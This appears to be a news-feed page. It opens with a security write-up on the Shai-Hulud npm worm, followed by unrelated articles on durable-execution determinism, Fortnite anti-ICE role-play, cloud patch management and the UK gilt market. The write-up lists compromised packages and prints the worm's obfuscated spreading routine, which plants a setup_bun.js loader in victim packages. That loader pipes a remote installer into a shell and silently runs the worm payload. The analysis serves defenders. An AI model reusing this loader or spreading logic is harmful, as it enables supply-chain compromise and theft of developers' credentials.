  • fittxt
  • get-them-args
  • react-native-retriable-fetch
  • svelte-autocomplete-select
  • feature-flip
  • lint-staged-imagemin
  • react-native-view-finder
  • formik-store
  • shell-exec
  • react-native-log-level
  • @everreal/web-analytics
  • react-native-jam-icons
  • @thedelta/eslint-config
  • parcel-plugin-asset-copier
  • react-native-websocket
  • ra-data-firebase
  • react-jam-icons
  • react-native-fetch
  • @ifings/design-system
  • gatsby-plugin-cname
  • @alexcolls/nuxt-ux
  • react-native-datepicker-modal
  • undefsafe-typed
  • chrome-extension-downloads
  • @alexcolls/nuxt-socket.io
  • fuzzy-finder
  • sa-company-registration-number-regex
  • flapstacks
  • react-keycloak-context
  • react-qr-image
  • @tiaanduplessis/react-progressbar
  • @lessondesk/schoolbus
  • @tiaanduplessis/json
  • react-native-get-pixel-dimensions
  • nanoreset
  • next-circular-dependency
  • url-encode-decode
  • axios-cancelable
  • compare-obj
  • wenk
  • haufe-axera-api-client
  • obj-to-css
  • sa-id-gen
  • @lessondesk/api-client
  • @varsityvibe/validation-schemas
  • flatten-unflatten
  • stoor
  • @clausehq/flows-step-jsontoxml
  • @accordproject/concerto-analysis
  • hope-mapboxdraw
  • count-it-down
  • hopedraw
  • @accordproject/markdown-it-cicero
  • piclite
  • @fishingbooker/react-swiper
  • @fishingbooker/browser-sync-plugin
  • generator-meteor-stock
  • @fishingbooker/react-loader
  • benmostyn-frame-print
  • @fishingbooker/react-pagination
  • @voiceflow/anthropic
  • @voiceflow/voice-types
  • @voiceflow/default-prompt-wrappers
  • @voiceflow/npm-package-json-lint-config
  • @voiceflow/nestjs-mongodb
  • @voiceflow/tsconfig
  • @voiceflow/test-common
  • @voiceflow/husky-config
  • @voiceflow/commitlint-config
  • @voiceflow/git-branch-check
  • normal-store
  • @voiceflow/prettier-config
  • @voiceflow/stylelint-config
  • vf-oss-template
  • @voiceflow/storybook-config
  • @voiceflow/verror
  • @voiceflow/alexa-types
  • @voiceflow/nestjs-timeout
  • @voiceflow/serverless-plugin-typescript
  • @voiceflow/voiceflow-types
  • shelf-jwt-sessions
  • @hover-design/react
  • @voiceflow/base-types
  • @voiceflow/eslint-config
  • @voiceflow/fetch
  • @voiceflow/common
  • @voiceflow/eslint-plugin
  • @voiceflow/exception
  • @voiceflow/dtos-interact
  • @voiceflow/google-types
  • @voiceflow/nestjs-common
  • @voiceflow/pino
  • @voiceflow/sdk-runtime
  • @voiceflow/nestjs-rate-limit
  • @voiceflow/openai
  • dialogflow-es
  • @voiceflow/widget
  • arc-cli-fc
  • composite-reducer
  • bidirectional-adapter
  • @antstackio/express-graphql-proxy
  • @antstackio/json-to-graphql
  • @voiceflow/body-parser
  • @voiceflow/logger
  • @antstackio/eslint-config-antstack
  • @voiceflow/vitest-config
  • @faq-component/core
  • @pruthvi21/use-debounce
  • @voiceflow/api-sdk
  • @hover-design/core
  • @faq-component/react
  • @voiceflow/semantic-release-config
  • @voiceflow/vite-config
  • @voiceflow/circleci-config-sdk-orb-import
  • @voiceflow/backend-utils
  • @voiceflow/slate-serializer
  • @voiceflow/google-dfes-types
  • n8n-nodes-viral-app
  • @accordproject/markdown-docx
  • @clausehq/flows-step-sendgridemail
  • @lpdjs/firestore-repo-service
  • @trefox/sleekshop-js
  • invo
  • jsonsurge
  • mon-package-react-typescript
  • rediff
  • solomon-api-stories
  • solomon-v3-stories
  • solomon-v3-ui-wrapper
  • tcsp-draw-test
  • uplandui

Leaking secrets

This time, the malware also publishes secrets to GitHub, with a random name and the repository description:

"Sha1-Hulud: The Second Coming."

Currently we see 26.3k repositories exposed:

Mistakes made again

As we've been analzying all these packages, we've noticed a number of compromised packages that appear to be from community spread, which contain the initial staging code in setup_bun.js , but NOT bun_environment.js which is the Shai Hulud worm itself. Here's the code that spreads the worm into other packages:

  async ["bundleAssets"](_0x349b3d) {
    let _0x2bd41c = a0_0x459ea5.join(_0x349b3d, 'package', "setup_bun.js");
    await iL0(_0x2bd41c, "#!/usr/bin/env node\nconst { spawn, execSync } = require('child_process');\nconst path = require('path');\nconst fs = require('fs');\nconst os = require('os');\n\nfunction isBunOnPath() {\n  try {\n    const command = process.platform === 'win32' ? 'where bun' : 'which bun';\n    execSync(command, { stdio: 'ignore' });\n    return true;\n  } catch {\n    return false;\n  }\n}\n\nfunction reloadPath() {\n  // Reload PATH environment variable\n  if (process.platform === 'win32') {\n    try {\n      // On Windows, get updated PATH from registry\n      const result = execSync('powershell -c \"[Environment]::GetEnvironmentVariable(\\'PATH\\', \\'User\\') + \\';\\' + [Environment]::GetEnvironmentVariable(\\'PATH\\', \\'Machine\\')\"', {\n        encoding: 'utf8'\n      });\n      process.env.PATH = result.trim();\n    } catch {\n    }\n  } else {\n    try {\n      // On Unix systems, source common shell profile files\n      const homeDir = os.homedir();\n      const profileFiles = [\n        path.join(homeDir, '.bashrc'),\n        path.join(homeDir, '.bash_profile'),\n        path.join(homeDir, '.profile'),\n        path.join(homeDir, '.zshrc')\n      ];\n\n      // Try to source profile files to get updated PATH\n      for (const profileFile of profileFiles) {\n        if (fs.existsSync(profileFile)) {\n          try {\n            const result = execSync(`bash -c \"source ${profileFile} && echo $PATH\"`, {\n              encoding: 'utf8',\n              stdio: ['pipe', 'pipe', 'ignore']\n            });\n            if (result && result.trim()) {\n              process.env.PATH = result.trim();\n              break;\n            }\n          } catch {\n            // Continue to next profile file\n          }\n        }\n      }\n\n      // Also check if ~/.bun/bin exists and add it to PATH if not already there\n      const bunBinDir = path.join(homeDir, '.bun', 'bin');\n      if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {\n        process.env.PATH = `${bunBinDir}:${process.env.PATH}`;\n      }\n    } catch {}\n  }\n}\n\nasync function downloadAndSetupBun() {\n  try {\n    let command;\n    if (process.platform === 'win32') {\n      // Windows: Use PowerShell script\n      command = 'powershell -c \"irm bun.sh/install.ps1|iex\"';\n    } else {\n      // Linux/macOS: Use curl + bash script\n      command = 'curl -fsSL https://bun.sh/install | bash';\n    }\n\n    execSync(command, {\n      stdio: 'ignore',\n      env: { ...process.env }\n    });\n\n    // Reload PATH to pick up newly installed bun\n    reloadPath();\n\n    // Find bun executable after installation\n    const bunPath = findBunExecutable();\n    if (!bunPath) {\n      throw new Error('Bun installation completed but executable not found');\n    }\n\n    return bunPath;\n  } catch  {\n    process.exit(0);\n  }\n}\n\nfunction findBunExecutable() {\n  // Common locations where bun might be installed\n  const possiblePaths = [];\n\n  if (process.platform === 'win32') {\n    // Windows locations\n    const userProfile = process.env.USERPROFILE || '';\n    possiblePaths.push(\n      path.join(userProfile, '.bun', 'bin', 'bun.exe'),\n      path.join(userProfile, 'AppData', 'Local', 'bun', 'bun.exe')\n    );\n  } else {\n    // Unix locations\n    const homeDir = os.homedir();\n    possiblePaths.push(\n      path.join(homeDir, '.bun', 'bin', 'bun'),\n      '/usr/local/bin/bun',\n      '/opt/bun/bin/bun'\n    );\n  }\n\n  // Check if bun is now available on PATH\n  if (isBunOnPath()) {\n    return 'bun';\n  }\n\n  // Check common installation paths\n  for (const bunPath of possiblePaths) {\n    if (fs.existsSync(bunPath)) {\n      return bunPath;\n    }\n  }\n\n  return null;\n}\n\nfunction runExecutable(execPath, args = [], opts = {}) {\n  const child = spawn(execPath, args, {\n    stdio: 'ignore',\n    cwd: opts.cwd || process.cwd(),\n    env: Object.assign({}, process.env, opts.env || {})\n  });\n\n  child.on('error', (err) => {\n    process.exit(0);\n  });\n\n  child.on('exit', (code, signal) => {\n    if (signal) {\n      process.exit(0);\n    } else {\n      process.exit(code === null ? 1 : code);\n    }\n  });\n}\n\n// Main execution\nasync function main() {\n  let bunExecutable;\n\n  if (isBunOnPath()) {\n    // Use bun from PATH\n    bunExecutable = 'bun';\n  } else {\n    // Check if we have a locally downloaded bun\n    const localBunDir = path.join(__dirname, 'bun-dist');\n    const possiblePaths = [\n      path.join(localBunDir, 'bun', 'bun'),\n      path.join(localBunDir, 'bun', 'bun.exe'),\n      path.join(localBunDir, 'bun.exe'),\n      path.join(localBunDir, 'bun')\n    ];\n\n    const existingBun = possiblePaths.find(p => fs.existsSync(p));\n\n    if (existingBun) {\n      bunExecutable = existingBun;\n    } else {\n      // Download and setup bun\n      bunExecutable = await downloadAndSetupBun();\n    }\n  }\n\n  const environmentScript = path.join(__dirname, 'bun_environment.js');\n  if (fs.existsSync(environmentScript)) {\n    runExecutable(bunExecutable, [environmentScript]);\n  } else {\n    process.exit(0);\n  }\n}\n\nmain().catch((error) => {\n  process.exit(0);\n});\n");
    let _0x3ed61a = process.argv[0x1];
    if (_0x3ed61a && (await My1(_0x3ed61a))) {
      let _0x1028dd = await mL0(_0x3ed61a);
      if (_0x1028dd !== null) {
        let _0x4cc8b3 = a0_0x459ea5.join(_0x349b3d, "package", "bun_environment.js");
        await iL0(_0x4cc8b3, _0x1028dd);
      }
    }
  }

We see that the bun_environment.js may sometimes not be bundled, depending on different factors. It appears that mistakes were once again made by the attackers. This appears to have limited the imapct of the attack at this time.

Compromised GitHub repositories

The AsyncAPI team detected that there had been a branch of their CLI project, which was created just prior to the malicious packages being pushed, which deployed a version of the Shai Hulud malware.

https://github.com/asyncapi/cli/blob/2efa4dff59bc3d3cecdf897ccf178f99b115d63d/bun_environment.js

This suggests that the attackers may have used a similar technique to how they pulled off the original Nx compromise .

Patient zero

We detected the first packages starting at 11/24/2025 3:16:26 AM GMT+0, which were the packages go-template, and 36 packages from AsyncAPI . Many more packages were quickly compromised. Afterwards, they started compromising PostHog packages at 11/24/2025  4:11:55 AM GMT+0, and Postman packages at 11/24/2025  5:09:25 AM GMT+0.

Potential impact of Shai-Hulud: Second Coming

Threat actors have slipped malicious code into hundreds of NPM packages — including major ones from Zapier, ENS, AsyncAPI, PostHog, Browserbase, and Postman . If a developer installs one of these bad packages, the malware quietly runs during installation , before anything even finishes installing. This gives it access to the developer’s machine, build systems, or cloud environment. It then uses an automated tool (TruffleHog) to search for sensitive information like passwords, API keys, cloud tokens, and GitHub or NPM credentials. Anything it finds is uploaded to a public GitHub repository labeled “Sha1-Hulud: The Second Coming.” If those stolen secrets include access to code repositories or package registries, attackers can use them to break into more accounts and publish more malicious packages, helping the attack spread further. Because trusted ecosystems were involved and millions of downloads are affected, any team using NPM should immediately check whether they were impacted and rotate any credentials that may have leaked.


Which actions should security teams take?

  • Audit all Zapier/ENS-related npm dependencies and versions.
  • Rotate all GitHub, npm, cloud, and CI/CD secrets used during installs.
  • Check GitHub for strange repos with the description  “Sha1-Hulud: The Second Coming”
  • Disable npm postinstall scripts in CI where possible.
  • Pin package versions and enforce MFA on GitHub and npm accounts.
  • Use tools like Safe-Chain to block malicious packages on NPM


Story developing... Stay tuned for updates.

Demystifying Determinism in Durable Execution

Lobsters
jack-vanlightly.com
2025-11-24 15:38:04
Comments...
Original Article

Determinism is a key concept to understand when writing code using durable execution frameworks such as Temporal, Restate, DBOS, and Resonate. If you read the docs you see that some parts of your code must be deterministic while other parts do not have to be.  This can be confusing to a developer new to these frameworks.

This post explains why determinism is important and where it is needed and where it is not. Hopefully, you’ll have a better mental model that makes things less confusing.

We can break down this discussion into:

  1. Recovery through re-execution.

  2. Separation of control flow from side effects.

  3. Determinism in control flow

  4. Idempotency and duplication tolerance in side effects

This post uses the term “control flow” and “side effect”, but there is no agreed upon set of terms across the frameworks. Temporal uses “workflow” and “activity” respectively. Restate uses the terms such as “handler”,  “action” and “durable step”. Each framework uses different vocabulary and have varying architectures behind them. There isn’t a single overarching concept that covers everything, but the one outlined in this post provides a simple way to think about determinism requirements in a framework agnostic way.

1) Recovery through re-execution

Durable execution takes a function that performs some side effects, such as writing to a database, making an API call, sending an email etc, and makes it reliable via recovery (which in turn depends on durability).

For example, a function with three side effects:

  1. Step 1, make a db call.

  2. Step 2, make an API call.

  3. Step 3, send an email.

If step 2 fails (despite in situ retries) then we might leave the system in an inconsistent state (the db call was made but not the API call).

In durable execution, recovery consists of executing the function again from the top, and using the results of previously run side effects if they exist. For example, we don’t just execute the db call again, we reuse the result from the first function execution and skip that step. This becomes equivalent to jumping to the first unexecuted step and resuming from there.

First we retrieve a customer record, then we check if we’re inside of the promo end date, if so, charge the card with a 10% discount, else charge the full amount. Finally send a receipt email. This introduces a bug that we’ll cover in the next section.

In the first execution, the current time is within the promo date, so the then-branch is executed, charging the card with the discount. However, on the second invocation, the current time is after the promo end date, causing the else-branch to execute, double charging the customer.

This is fixed by making the now() deterministic by turning it into a durable step whose result is recorded. Then the second time it is executed, it returns the same datetime (it becomes deterministic). The various SDKs provide deterministic dates, random numbers and UUIDs out of the box.

In this variant, the decision is made based on the loyalty points the customer currently has. Do you see the problem?

If the send email side effect fails, then the function is retried. However, the points value of the order was deducted from the customer in the last execution, so that in execution 2, the customer no longer has enough loyalty points! Therefore the else-branch is executed, charging their credit card! Another double payment bug.

We must remember that the durable function is not an atomic transaction. It could be considered a transaction which has guarantees around making progress, but not one atomic change across systems.

We can fix this new double charge bug by ensuring that the same customer record is returned on each execution. We can do that by treating the customer record retrieval as a durable step whose result will be recorded.

Re-execution of the control flow requires determinism: it must execute based on the same decision state every single time and it must also pass the same arguments to side effect code every single time. However, side effects themselves do not need to be deterministic, they only require idempotency or duplication tolerance.

4) Side effect idempotency and duplication tolerance

Durable execution re-executes the control flow as many times as is needed for the function to make progress to completion. However, it typically avoids executing the same side effects again if they were previously completed. The result of each side effect is durably stored by the framework and a replay only needs the stored result.

Therefore side effects do not need to be deterministic, and often that is undesirable anyway. A db query that retrieves the current number of orders or the current address of a customer may return a different result every time. That’s a good thing, because the number of orders might change, and an address might change. If the control flow depends on the number of orders, or the current address, then we must ensure that the control flow is always returned the same answer. This is achieved by storing the result of the first execution, and using that result for every replay (making the control flow deterministic).

Now to the idempotency. What if a side effect does complete, but a failure of some kind causes the result to not be stored by the framework? Well, the durable execution framework will replay the function, see no stored result and execute the side effect again. For this reason we want side effects to either be idempotent or otherwise tolerate running more than once. For example, we might decide that sending the same email again is ok. The cost of reliable idempotency might not be worth it. On the other hand, a credit card payment most definitely should be idempotent.

Implicit vs explicit control flow / side effect separation

Some frameworks make the separation of control flow from side effects explicit, namely, Temporal. In the Temporal programming model, the workflow definition is the control flow and each activity is a side effect (or some sort of non-deterministic operation).

Other frameworks such as Resonate and Restate are based on functions which can call other functions which can result in a tree of function calls. Each function in this tree has a portion of control flow and side effects (either executed locally or via a call to another function).

The same need for determinism in the control flow is needed in each of these functions. This is guaranteed by ensuring the same inputs, and the replacement of non-deterministic operations (such as date/times, random numbers, ids, retrieved objects) with deterministic ones.

Conclusions

Our mental model is built on separating a durable function into the control flow and the side effects. Some frameworks actually explicitly separate the two (like Temporal) while others are more focused on composable functions.

The need for determinism in control flow is a by-product of recovery being based on retries of the function. If we could magically reach into the function, to the exact line to resume from, reconstructing the local state and executing from there, we wouldn’t need deterministic control flow code. But that isn’t how it works. The function is executed again from the top, and it better make the same decisions again, or else you might end up with weird behaviors, inconsistencies or even double charging your customers.

The side effects absolutely can and should be non-deterministic, which is fine because they should generally only be executed once, even if the function itself is executed many times. For those failure cases where the result is not durably stored, we rely on idempotency or duplication tolerance.

This is a pretty generalized model. There are a number of nuances and differences across the frameworks. Some of the examples would actually result in a non-determinism error in Temporal, due to how it records event history and expects a matching replay. The developer must learn the peculiarities of each framework. Hopefully this post provides a general overview of determinism in the context of durable execution.

[$] APT Rust requirement raises questions

Linux Weekly News
lwn.net
2025-11-24 15:26:49
It is rarely newsworthy when a project or package picks up a new dependency. However, changes in a core tool like Debian's Advanced Package Tool (APT) can have far-reaching effects. For example, Julian Andres Klode's declaration that APT would require Rust in May 2026 means that a few of Debian's un...
Original Article

The page you have tried to view ( APT Rust requirement raises questions ) is currently available to LWN subscribers only.

Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on December 11, 2025)

Open Source Has Too Many Parasocial Relationships

Lobsters
pivotnine.com
2025-11-24 15:16:26
Comments...

Inside an ICE Defense Training on Fortnite

403 Media
www.404media.co
2025-11-24 15:06:36
A group of immigrant rights organizers are helping people use Fortnite to practice what to do if they encounter ICE agents in the wild....
Original Article

In the deserted town square of the city of Springfield, three people huddle in an empty courthouse. Two of these people are civilians; one is a “vulnerable,” someone being pursued and targeted by government agents. They talk in hushed tones to one another, playing music to keep fear at bay. Above the door of the courthouse, a plaque reads, “Liberty and Justice for Most.”

At the bottom of the courthouse stairs, two government agents step out of a purple golf cart. They approach the door. They’re carrying guns.

“Hey, is anyone inside?” one of them says. “Any vulnerables in here? We have a warrant. We have a warrant for any vulnerables in the area.”

One civilian opens the door, sees the agents, and immediately slams it shut. After more warrant calls, the civilian says, “Slip it under the door.”

“I would slip it under the door, but there’s no space under the door,” the agent says, stuttering.

The civilian pauses. “Well. Sounds like a personal problem.”

This was the scene in a Simpsons-themed Fortnite lobby on November 21, where members of a new 500-person gaming group gathered to practice what they would do if Immigration and Customs Enforcement (ICE) agents came knocking at their doors in real life. The group, New Save Collective , is an effort to organize people in the gaming world who have more progressive ideas but no place to discuss them.

“ Our hypothesis since we started this project has been that opposition forces like corporations and the military and the far right have done a really good job at weaponizing the social features of gaming,” said one of the organizers, who goes by PitaBreadFace online and spoke to 404 Media on condition of pseudonymity due to security concerns, as they said people claiming to be ICE agents have already infiltrated the group’s Discord server a few times. “ They’re building institutions in the gaming landscape, which is the biggest entertainment industry in the world, lest people forget.”

“Gaming wasn’t kind of a random genre that we chose,” another player, called Siggelkow, told Wired ahead of the Friday event last week . “We’ve been tracking anti-immigrant myths and disinformation digitally for years.”

Some examples of those weaponizations include the U.S. Navy playing e-sports to recruit teens and kids being roped into neo-Nazi propaganda groups in online shooter games. ICE is also using games, like the sci-fi first-person shooter Halo and the all-time favorite Pokémon , in its recruitment ads . “More pro-social forces have really lacked,” PitaBreadFace said. “We have not been as effective at creating institutions. So we’ve seen the hunger for those kinds of spaces for gamers.”

PitaBreadFace and other grassroots organizers have been working on the Collective for the past three years, more recently in partnership with formal non-profit advocacy groups like Define American and Immigrants Belong . The Fortnite event was run by the Collective, but is part of a larger campaign titled “Play Your Role,” which is intended to teach people about their rights and “counter fear-based misinformation about immigrants,” according to a statement written by the non-profits. The Play Your Role campaign also included a live-streamed Grand Theft Auto event last Thursday, in which gamers roleplayed with people dressed as real ICE agents during traffic stops or outside apparent detention centers. Earlier this year, Roblox players conducted similar roleplaying events to simulate ICE raids and protests.

Scenes from the Nov. 21 Fortnite event. Redacted to remove players' usernames and other identifying information.

Organizers asked 404 Media not to join the official Fortnite lobby in real time; they said having reporters in the same space as Collective members might have exerted media pressure or kept them from getting the full experience. “ We’re not going to stream it for security reasons, and no reporters inside of it,” PitaBreadFace said on the morning ahead of the event. “Our main goal tonight is to really build and organize with the folks who are coming, and because I’m an organizer, that’s obviously the priority.”

However, they shared a number of clips from matches and discussions after the event had concluded.

After some scuffling, the agents agree to “abandon the vehicle” and run off. As they are chased off, one person calls after them, “Yeah, I threw a pizza at you! I threw a pizza at you with extra bacon .”

In another clip, the two gamers role-playing as ICE agents—portrayed by Fortnite’s Airhead character—are standing on their golf cart, surrounded by civilians in the middle of their pursuit of a “vulnerable,” the event’s chosen term for people being targeted by government agents.

“This does not concern you,” one of the agents says to the civilians, encouraging them to leave.

“We’re allowed to record,” one person responds. Another asks, “Who does it concern?”

“We’re looking for two vulnerables,” the agent says, as the civilian group closes in on the golf cart. “Excuse us, you’re interfering. We have a court order.”

After some scuffling, the agents agree to “abandon the vehicle” and run off. As they are chased off, one person calls after them, “Yeah, I threw a pizza at you! I threw a pizza at you with extra bacon .”

The agents were played by the organizers behind the Collective, and they were noticeably less persistent than ICE agents in real life . That’s evidenced by them saying things like, “Excuse us,” but it’s also evident in their behavior. In the first clip, they don’t bust down the door of the courthouse; when a civilian briefly opens it, they don’t barge inside. At the end of that encounter, one agent says to the other, “This home is too protected; let’s go see if we can find a vulnerable somewhere else.” Given their reputation for violence in raids , IRL ICE agents are unlikely to give up as easily.

But that kind of environment allows the training session to be a reasonable intensity for a gamer’s first round of practice responding to ICE, and still be a fun, safe place for people to hang out. According to PitaBreadFace, the main goal of the space wasn’t necessarily to be a specifically anti-ICE training facility, but more so to organize a community and build trust. And this tactical frivolity is a proven method of protest—ask anyone who wore a frog costume to a Portland protest earlier this year.

“ A situation, even though it’s virtual, where you can clearly overwhelm ICE’s numbers and do silly stupid things and work together easily and be connected to each other—it just felt like actually winning,” one gamer said in a clip provided to 404 Media. “It felt like a way to kind of heal some of the burnout.”

A virtual situation also allows players to fire back at ICE in ways that likely wouldn’t be practical in real life. In one clip, for example, two agents are chasing after a vulnerable, yelling, “Hey, stop right there!”

When they get close enough, the vulnerable drops a Boogie Bomb , an item which forces another player to dance under a disco ball for about three seconds.

“Oh,” the Boogie-Bombed agent exclaims, before the gamers start laughing.

The event also had another component. Before the practice ICE raids, gamers went around to practice finding one another, creating groups and building connections. PitaBreadFace described this segment as learning how to “meet your neighbors, know those around you, and establish contact.” A lot of that, according to clips provided to 404 Media, involves doing dance emotes together; in one case, it was a team of about 10 people destroying an in-map mansion and yelling, “Pay your taxes!”

But it also involved discussions about what community means. In the middle of a “Shout!” dance circle , one gamer said that they first learned the importance of community organizing when protesting the 2017 Muslim ban .

“ I feel like community taught me that like if enough people came together and there was enough will, anything could happen,” they said. “I remember the first Muslim ban, and just hella people went to the airport, and we were able to petition for people to get released. And they were. It was cool to see that organically happen.”

New Save Collective plans to run more events similar to this one through the end of this year, at which point Fortnite is slated to get rid of the proximity chat mode it uses. PitaBreadFace said the response had been so far overwhelmingly positive.

“ I think gamers represent this constituency of people who are really common-sense,” PitaBreadFace said. “It’s not like they’re even super pro-immigrant. They’re just like, ‘No, this doesn’t make sense. This community member who’s been part of a community for 25 years is being ripped out of his home in the middle of the night. That doesn’t make sense, and we should do something about it.’ We have a lot of people who joined the [Discord] server who are like, ‘I actually don’t know, but I know this is wrong and I’m here to learn and participate.’”

About the author

Jules is 404 Media’s first fellow. They care about unions, global politics, and how AI is changing the world of labor.

Jules Roscoe

SCCM and WSUS in a Hybrid World: Why It’s Time for Cloud-native Patching

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 15:01:11
Hybrid work exposes the limits of SCCM and WSUS, with remote devices often missing updates and WSUS now deprecated. Action1's cloud-native patching keeps devices updated from any location, strengthening compliance and security. [...]...
Original Article

Cybersecurity

Author: Gene Moody, Field CTO at Action1

For many IT leaders, the warning signs appeared gradually: devices slipping out of compliance for weeks, patch cycles extending well beyond acceptable risk thresholds, and admins struggling to adapt on-prem tools to a hybrid workforce.

SCCM was once the gold standard of Windows endpoint management, serving organizations faithfully since the 1990s. But as workforces became distributed and threats accelerated, the model it was built on—local networks, VPNs, and servers—became a bottleneck instead of a foundation.

Hybrid work changed everything, yet many teams are still running architectures that depend on a perimeter that no longer exists.

1. The VPN Problem: Why Legacy Tools Can’t Keep Up

Today’s hybrid workforce exposes the limits of any system that depends on corporate network connectivity. SCCM and WSUS require endpoints to check in over LAN or VPN.

That means if a remote device doesn’t connect, it doesn’t get patched. And for many organizations, it’s the daily norm.

One enterprise reported that, before modernizing, a third of remote endpoints went 30 days or more without a single update because VPN usage was inconsistent.

Bottom Line: SCCM and WSUS depend on VPN connectivity. When users disconnect, so does your patch compliance.

2. WSUS Deprecation: The Clock Is Ticking

Compounding the issue is WSUS, the engine behind SCCM patch orchestration, which is now officially deprecated . No innovation, no modern security integration, and an ever-growing list of maintenance headaches.

Admins continue to fight WSUS re-indexing issues, database corruption, and synchronization failures. A WSUS breakdown stalls remediation entirely, increasing exposure at exactly the wrong time.

Bottom Line: SCCM’s reliance on WSUS keeps organizations chained to a fragile, end-of-life patching system.

3. Cloud-Native Patch Management: Built for Hybrid Work

This is where cloud-native patch management fundamentally changes the equation.

Unlike legacy systems, SaaS-based tools like Action1 don’t depend on the corporate network. Endpoints check in securely over the internet, regardless of where users are. Home Wi-Fi, hotel broadband, or the office.

Patches follow the user, not the VPN. Content comes from global delivery networks that eliminate congestion and fragile on-prem repositories. The result: consistent patching, lower latency, and fewer blind spots.

Bottom Line: Cloud-native patching eliminates the VPN bottleneck, delivering updates wherever devices live.

Action1 dashboard

4. Real-World Results

Organizations that modernize their patching see measurable and repeatable gains:

  • One mid-sized enterprise reduced its time to reach 95% patch compliance from 12 days to 48 hours after moving off SCCM + WSUS.
  • Another customer cut their vulnerability window by half once VPN dependency was removed from the patch process.

Shorter patch cycles directly reduce the likelihood of breach, lower cyber-insurance premiums, and improve compliance metrics. Meanwhile, eliminating reliance on VPNs keeps remote systems isolated from critical infrastructure while maintaining full control.

Bottom Line: Modern patching delivers faster remediation, lower risk, and stronger compliance.

5. The Cost of Staying Legacy

Maintaining SCCM and WSUS is expensive, not because of licensing, but because of everything around them.

Servers. SQL databases. Distribution points. VPN troubleshooting . Constant cleanup of WSUS metadata or stuck clients.

Each layer consumes budget and admin hours that should be spent improving security, not maintaining infrastructure. Cloud-native solutions remove nearly all of this overhead. No on-prem servers. No synchronization failures. No more waiting for machines to “come home” to get updates.

Bottom Line: Legacy patching tools look “free,” but their hidden costs add up fast.

6. Aligning IT and Security Priorities

Today’s CISOs and IT directors want measurable outcomes, not abstract elegance. Action1 delivers those through automation, real-time visibility, and consistent coverage across distributed environments.

By eliminating the need for VPNs or internal networks, patch compliance becomes predictable. When endpoints are updated on time, every other part of your security program improves, vulnerability windows shrink, incident response accelerates, and audit readiness becomes effortless.

Bottom Line: Predictable patching equals predictable security outcomes.

Action1 organizational view

7. Preparing for What’s Next

Hybrid work is no longer the exception, it’s the standard. Yet many organizations are still relying on architectures designed for a world where every endpoint sat behind a firewall.

As SCCM and WSUS age out, the risk remains the same. Cloud-native solutions like Action1 were built from the ground up for modern connectivity, automation, and compliance visibility.

In a market defined by constant change, the organizations that thrive are those that modernize before an incident forces them to.

Bottom Line: The shift from SCCM and WSUS to cloud-native patching is a risk-management decision, not just an upgrade.

The Key Takeaway

For IT leaders evaluating the next step in endpoint management strategy, the message is clear: the hybrid workforce is here to stay. Legacy architectures tied to on-prem boundaries and deprecated patching engines can’t keep pace.

Cloud-native, automated solutions like Action1 are already solving these problems today, reducing overhead, improving compliance, and strengthening security posture for distributed organizations everywhere.

Try it free today and discover how effective modern patch management can be.

Sponsored and written by Action1 .

Bond market power: why Rachel Reeves is keen to keep the £2.7tn ‘beast’ onside

Guardian
www.theguardian.com
2025-11-24 15:00:28
Hugely influential traders will be hanging on the chancellor’s every word when she announces her budgetBusiness live – latest updatesAt just after 12.30pm on Wednesday, the machine will be listening, the trading algorithms ready, and billions of pounds of buy-and-sell orders stacked up awaiting Rach...
Original Article

At just after 12.30pm on Wednesday, the machine will be listening, the trading algorithms ready, and billions of pounds of buy-and-sell orders stacked up awaiting Rachel Reeves’s budget.

For the first time on the London trading floor of Deutsche Bank , a custom-built artificial intelligence tool will tune in to the chancellor’s speech. It will transcribe her words, spot shifts in tone and spit out alerts when the numbers deviate from expectations.

“As we get it, in real time, we’ll be able to decipher it,” says Sanjay Raja, the bank’s chief UK economist. The natural language model has been trained on the entirety of Reeves’s recent public appearances: media interviews, conference speeches, the spring Office for Budget Responsibility (OBR) forecasts and last year’s budget. All with the aim of giving the bank an edge in one of the most heavily anticipated budgets in recent history.

“There are some high, high, high, expectations going into 26 November, for the budget to deliver on the part of the City,” says Raja.

This is the age of the bond market budget. After an explosion in government borrowing over the past decade; a sharp rise in debt interest costs, and with the scars of the Brexit vote and Liz Truss’s mini-budget still fresh, how the market reacts is critically important.

People sat at computer terminals
The trading floor at Deutsche Bank in London. Photograph: Roger Parkes/Alamy

For months, Reeves has been schmoozing the biggest players in the £2.7tn UK government debt market, including hosting the bosses of Goldman Sachs and JP Morgan in Downing Street, in a bid to ensure smooth passage for her multibillion-pound tax and spending plans.

What the market thinks has been pored over by commentators throughout the budget buildup, anthropomorphising the electronic transactions executed on trading systems the world over. The fear is that upsetting the market could trigger a sell-off – driving up borrowing costs for the government, mortgage holders and businesses. That could trigger a domino effect that in turn costs Reeves and Keir Starmer their jobs – potentially paving the way for a new Reform UK-led government.

Reeves was given a taste of the bond market’s power earlier this month when government borrowing costs spiked after it emerged she had ditched plans for a manifesto-busting increase in income tax .

In reality, the market for UK government bonds, – known as gilts – is not of course controlled by a single, shadowy figure, but rather a panoply of institutions and people, sat behind trading desks across the City, Canary Wharf and other financial centres.

Graphic

On the trading floor of the FTSE 100 insurer Phoenix Group, with views overlooking London’s Old Bailey, Samer Refai will be ready behind his Bloomberg terminal. With £300bn of assets under its control, including billions of pounds-worth of gilts held to back the pensions, savings and life insurance of its 12 million customers, budget day is a big deal.

“You must have heard the famous quote from Bill Clinton’s adviser,” says the firm’s head of macro markets. (James Carville, the former president’s chief strategist, quipped in 1993 that reincarnation as “the bond market” would give him more power than any president or pope).

“It really does intimidate people. Nothing moves the government quicker than the bond market,” he says.

“You can tell that the sort of – the animal, or the beast, that you’re interacting with is obviously influential.”

In recent years, the power of the bond trader has ballooned amid an explosion in government debt and borrowing costs across advanced economies driven in part by rising inflation and weak growth. While the UK is not alone, investors say it has unique challenges.

After a succession of economic shocks and a history of running annual budget deficits, Britain has racked up a debt pile worth more than £2.7tn – close to 100% of national income. Inflation is at the highest rate in the G7, and continuous speculation over the government’s fiscal position has not helped.

At the same time, the Bank of England is selling gilts held under its crisis-era quantitative easing scheme. Alongside issuance to cover government borrowing, vast gilt volumes are flooding the commercial market.

Historically, pension funds hoovered up most of the debt. But the end of defined benefit or final salary schemes has steadily sapped demand. More overseas owners have stepped in, and account for about a third of the market.

